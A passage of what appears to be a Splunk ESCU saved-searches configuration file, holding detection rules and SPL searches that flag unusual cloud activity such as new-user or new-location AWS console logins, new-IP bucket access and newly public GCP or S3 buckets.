user and service accounts that have created/modified/deleted a security group .\ The analytics returned fields allow analysts to investigate the event further by providing fields like source ip and values of the security objects affected. action.escu.how_to_implement = This search requries the Cloud infrastructure logs such as AWS Cloudtrail, GCP Pubsub Message logs, Azure Audit logs to be ingested into an accelerated Change datamodel. It is also recommended that users can try different combinations of the `bucket` span time and outlier conditions to better suit with their environment. action.escu.known_false_positives = It is possible that legitimate user/admin may modify a number of security groups action.escu.creation_date = 2024-02-21 action.escu.modification_date = 2024-02-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Security Groups Modifications by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud User Activities"] action.risk = 1 action.risk.param._risk_message = Unsual number cloud security group modifications detected by user - $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cloud Security Groups Modifications by User - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1578.005"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats dc(All_Changes.object) as unique_security_groups values(All_Changes.src) as src values(All_Changes.user_type) as user_type values(All_Changes.object_category) as object_category values(All_Changes.object) as objects values(All_Changes.action) as action values(All_Changes.user_agent) as user_agent values(All_Changes.command) as command from datamodel=Change WHERE All_Changes.object_category = "security_group" (All_Changes.action = modified OR All_Changes.action = deleted OR All_Changes.action = created) by All_Changes.user _time span=30m | `drop_dm_object_name("All_Changes")` | eventstats avg(unique_security_groups) as avg_changes , stdev(unique_security_groups) as std_changes by user | eval upperBound=(avg_changes+std_changes*3) | eval isOutlier=if(unique_security_groups > 2 and unique_security_groups >= upperBound, 1, 0) | where isOutlier=1| `cloud_security_groups_modifications_by_user_filter` [ESCU - Detect AWS Console Login by New User - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1552"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour action.escu.how_to_implement = You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. action.escu.known_false_positives = When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate. action.escu.creation_date = 2022-05-10 action.escu.modification_date = 2022-05-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AWS Console Login by New User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect AWS Console Login by New User - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1552"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user | `drop_dm_object_name(Authentication)` | join user type=outer [ | inputlookup previously_seen_users_console_logins | stats min(firstTime) as earliestseen by user] | eval userStatus=if(earliestseen >= relative_time(now(), "-24h@h") OR isnull(earliestseen), "First Time Logging into AWS Console", "Previously Seen User") | where userStatus="First Time Logging into AWS Console" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_aws_console_login_by_new_user_filter` [ESCU - Detect AWS Console Login by User from New City - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour action.escu.how_to_implement = You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in AWS CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in AWS CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_city_filter` macro. action.escu.known_false_positives = When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate. action.escu.creation_date = 2022-08-25 action.escu.modification_date = 2022-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AWS Console Login by User from New City - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect AWS Console Login by User from New City - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | rename City as justSeenCity | table firstTime lastTime user justSeenCity | join user type=outer [| inputlookup previously_seen_users_console_logins | rename City as previouslySeenCity | stats min(firstTime) AS earliestseen by user previouslySeenCity | fields earliestseen user previouslySeenCity] | eval userCity=if(firstTime >= relative_time(now(), "-24h@h"), "New City","Previously Seen City") | where userCity = "New City" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user previouslySeenCity justSeenCity userCity | `detect_aws_console_login_by_user_from_new_city_filter` [ESCU - Detect AWS Console Login by User from New Country - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour action.escu.how_to_implement = You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in AWS CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in AWS CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_country_filter` macro. action.escu.known_false_positives = When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate. action.escu.creation_date = 2022-08-25 action.escu.modification_date = 2022-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AWS Console Login by User from New Country - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect AWS Console Login by User from New Country - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | rename Country as justSeenCountry | table firstTime lastTime user justSeenCountry | join user type=outer [| inputlookup previously_seen_users_console_logins | rename Country as previouslySeenCountry | stats min(firstTime) AS earliestseen by user previouslySeenCountry | fields earliestseen user previouslySeenCountry] | eval userCountry=if(firstTime >= relative_time(now(), "-24h@h"), "New Country","Previously Seen Country") | where userCountry = "New Country" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user previouslySeenCountry justSeenCountry userCountry | `detect_aws_console_login_by_user_from_new_country_filter` [ESCU - Detect AWS Console Login by User from New Region - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour action.escu.how_to_implement = You must install and configure the Splunk Add-on for AWS (version 5.1.0 or later) and Enterprise Security 6.2, which contains the required updates to the Authentication data model for cloud use cases. Run the `Previously Seen Users in AWS CloudTrail - Initial` support search only once to create a baseline of previously seen IAM users within the last 30 days. Run `Previously Seen Users in AWS CloudTrail - Update` hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. You can also provide additional filtering for this search by customizing the `detect_aws_console_login_by_user_from_new_region_filter` macro. action.escu.known_false_positives = When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate. action.escu.creation_date = 2022-08-25 action.escu.modification_date = 2022-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AWS Console Login by User from New Region - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect AWS Console Login by User from New Region - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities", "Suspicious Cloud Authentication Activities", "AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication where Authentication.signature=ConsoleLogin by Authentication.user Authentication.src | iplocation Authentication.src | `drop_dm_object_name(Authentication)` | rename Region as justSeenRegion | table firstTime lastTime user justSeenRegion | join user type=outer [| inputlookup previously_seen_users_console_logins | rename Region as previouslySeenRegion | stats min(firstTime) AS earliestseen by user previouslySeenRegion | fields earliestseen user previouslySeenRegion] | eval userRegion=if(firstTime >= relative_time(now(), "-24h@h"), "New Region","Previously Seen Region") | where userRegion= "New Region" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime lastTime user previouslySeenRegion justSeenRegion userRegion | `detect_aws_console_login_by_user_from_new_region_filter` [ESCU - Detect GCP Storage access from a new IP - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks at GCP Storage bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed a GCP Storage bucket. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks at GCP Storage bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed a GCP Storage bucket. action.escu.how_to_implement = This search relies on the Splunk Add-on for Google Cloud Platform, setting up a Cloud Pub/Sub input, along with the relevant GCP PubSub topics and logging sink to capture GCP Storage Bucket events (https://cloud.google.com/logging/docs/routing/overview). In order to capture public GCP Storage Bucket access logs, you must also enable storage bucket logging to your PubSub Topic as per https://cloud.google.com/storage/docs/access-logs. These logs are deposited into the nominated Storage Bucket on an hourly basis and typically show up by 15 minutes past the hour. It is recommended to configure any saved searches or correlation searches in Enterprise Security to run on an hourly basis at 30 minutes past the hour (cron definition of 30 * * * *). A lookup table (previously_seen_gcp_storage_access_from_remote_ip.csv) stores the previously seen access requests, and is used by this search to determine any newly seen IP addresses accessing the Storage Buckets. action.escu.known_false_positives = GCP Storage buckets can be accessed from any IP (if the ACLs are open to allow it), as long as it can make a successful connection. This will be a false postive, since the search is looking for a new IP within the past two hours. action.escu.creation_date = 2020-08-10 action.escu.modification_date = 2020-08-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect GCP Storage access from a new IP - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Suspicious GCP Storage Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"threat_object_field": "remote_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect GCP Storage access from a new IP - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious GCP Storage Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` | multikv | rename sc_status_ as status | rename cs_object_ as bucket_name | rename c_ip_ as remote_ip | rename cs_uri_ as request_uri | rename cs_method_ as operation | search status="\"200\"" | stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip operation request_uri | table firstTime, lastTime, bucket_name, remote_ip, operation, request_uri | inputlookup append=t previously_seen_gcp_storage_access_from_remote_ip | stats min(firstTime) as firstTime, max(lastTime) as lastTime by bucket_name remote_ip operation request_uri | outputlookup previously_seen_gcp_storage_access_from_remote_ip | eval newIP=if(firstTime >= relative_time(now(),"-70m@m"), 1, 0) | where newIP=1 | eval first_time=strftime(firstTime,"%m/%d/%y %H:%M:%S") | eval last_time=strftime(lastTime,"%m/%d/%y %H:%M:%S") | table first_time last_time bucket_name remote_ip operation request_uri | `detect_gcp_storage_access_from_a_new_ip_filter` [ESCU - Detect New Open GCP Storage Buckets - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for GCP PubSub events where a user has created an open/public GCP Storage bucket. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]} action.escu.data_models = ["Email"] action.escu.eli5 = This search looks for GCP PubSub events where a user has created an open/public GCP Storage bucket. action.escu.how_to_implement = This search relies on the Splunk Add-on for Google Cloud Platform, setting up a Cloud Pub/Sub input, along with the relevant GCP PubSub topics and logging sink to capture GCP Storage Bucket events (https://cloud.google.com/logging/docs/routing/overview). action.escu.known_false_positives = While this search has no known false positives, it is possible that a GCP admin has legitimately created a public bucket for a specific purpose. That said, GCP strongly advises against granting full control to the "allUsers" group. action.escu.creation_date = 2020-08-05 action.escu.modification_date = 2020-08-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect New Open GCP Storage Buckets - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Suspicious GCP Storage Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect New Open GCP Storage Buckets - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious GCP Storage Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for GCP PubSub events where a user has created an open/public GCP Storage bucket. action.notable.param.rule_title = Detect New Open GCP Storage Buckets action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.resource.type=gcs_bucket data.protoPayload.methodName=storage.setIamPermissions | spath output=action path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.action | spath output=user path=data.protoPayload.authenticationInfo.principalEmail | spath output=location path=data.protoPayload.resourceLocation.currentLocations{} | spath output=src path=data.protoPayload.requestMetadata.callerIp | spath output=bucketName path=data.protoPayload.resourceName | spath output=role path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.role | spath output=member path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.member | search (member=allUsers AND action=ADD) | table _time, bucketName, src, user, location, action, role, member | search `detect_new_open_gcp_storage_buckets_filter` [ESCU - Detect New Open S3 buckets - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket. action.escu.how_to_implement = You must install the AWS App for Splunk. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created a public bucket for a specific purpose. That said, AWS strongly advises against granting full control to the "All Users" group. action.escu.creation_date = 2021-07-19 action.escu.modification_date = 2021-07-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect New Open S3 buckets - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS S3 Activities"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has created an open/public bucket $bucketName$ with the following permissions $permission$ action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 48}, {"risk_object_field": "bucketName", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect New Open S3 buckets - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket. action.notable.param.rule_title = Detect New Open S3 buckets action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=s3.amazonaws.com eventName=PutBucketAcl | rex field=_raw "(?{.+})" | spath input=json_field output=grantees path=requestParameters.AccessControlPolicy.AccessControlList.Grant{} | search grantees=* | mvexpand grantees | spath input=grantees output=uri path=Grantee.URI | spath input=grantees output=permission path=Permission | search uri IN ("http://acs.amazonaws.com/groups/global/AllUsers","http://acs.amazonaws.com/groups/global/AuthenticatedUsers") | search permission IN ("READ","READ_ACP","WRITE","WRITE_ACP","FULL_CONTROL") | rename requestParameters.bucketName AS bucketName | stats count min(_time) as firstTime max(_time) as lastTime by user_arn userIdentity.principalId userAgent uri permission bucketName | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_new_open_s3_buckets_filter` [ESCU - Detect New Open S3 Buckets over AWS CLI - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket over the aws cli. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket over the aws cli. action.escu.how_to_implement = action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created a public bucket for a specific purpose. That said, AWS strongly advises against granting full control to the "All Users" group. action.escu.creation_date = 2021-07-19 action.escu.modification_date = 2021-07-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect New Open S3 Buckets over AWS CLI - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS S3 Activities"] action.risk = 1 action.risk.param._risk_message = User $userIdentity.userName$ has created an open/public bucket $bucketName$ using AWS CLI with the following permissions - $requestParameters.accessControlList.x-amz-grant-read$ $requestParameters.accessControlList.x-amz-grant-read-acp$ $requestParameters.accessControlList.x-amz-grant-write$ $requestParameters.accessControlList.x-amz-grant-write-acp$ $requestParameters.accessControlList.x-amz-grant-full-control$ action.risk.param._risk = [{"risk_object_field": "userIdentity.userName", "risk_object_type": "other", "risk_score": 48}, {"risk_object_field": "bucketName", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect New Open S3 Buckets over AWS CLI - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user has created an open/public S3 bucket over the aws cli. action.notable.param.rule_title = Detect New Open S3 Buckets over AWS CLI action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource="s3.amazonaws.com" (userAgent="[aws-cli*" OR userAgent=aws-cli* ) eventName=PutBucketAcl OR requestParameters.accessControlList.x-amz-grant-read-acp IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write-acp IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-full-control IN ("*AuthenticatedUsers","*AllUsers") | rename requestParameters.bucketName AS bucketName | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userIdentity.userName userIdentity.principalId userAgent bucketName requestParameters.accessControlList.x-amz-grant-read requestParameters.accessControlList.x-amz-grant-read-acp requestParameters.accessControlList.x-amz-grant-write requestParameters.accessControlList.x-amz-grant-write-acp requestParameters.accessControlList.x-amz-grant-full-control | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_new_open_s3_buckets_over_aws_cli_filter` [ESCU - Detect S3 access from a new IP - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks at S3 bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed an S3 bucket. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks at S3 bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed an S3 bucket. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your S3 access logs' inputs. This search works best when you run the "Previously Seen S3 Bucket Access by Remote IP" support search once to create a history of previously seen remote IPs and bucket names. action.escu.known_false_positives = S3 buckets can be accessed from any IP, as long as it can make a successful connection. This will be a false postive, since the search is looking for a new IP within the past hour action.escu.creation_date = 2018-06-28 action.escu.modification_date = 2018-06-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect S3 access from a new IP - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious AWS S3 Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect S3 access from a new IP - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 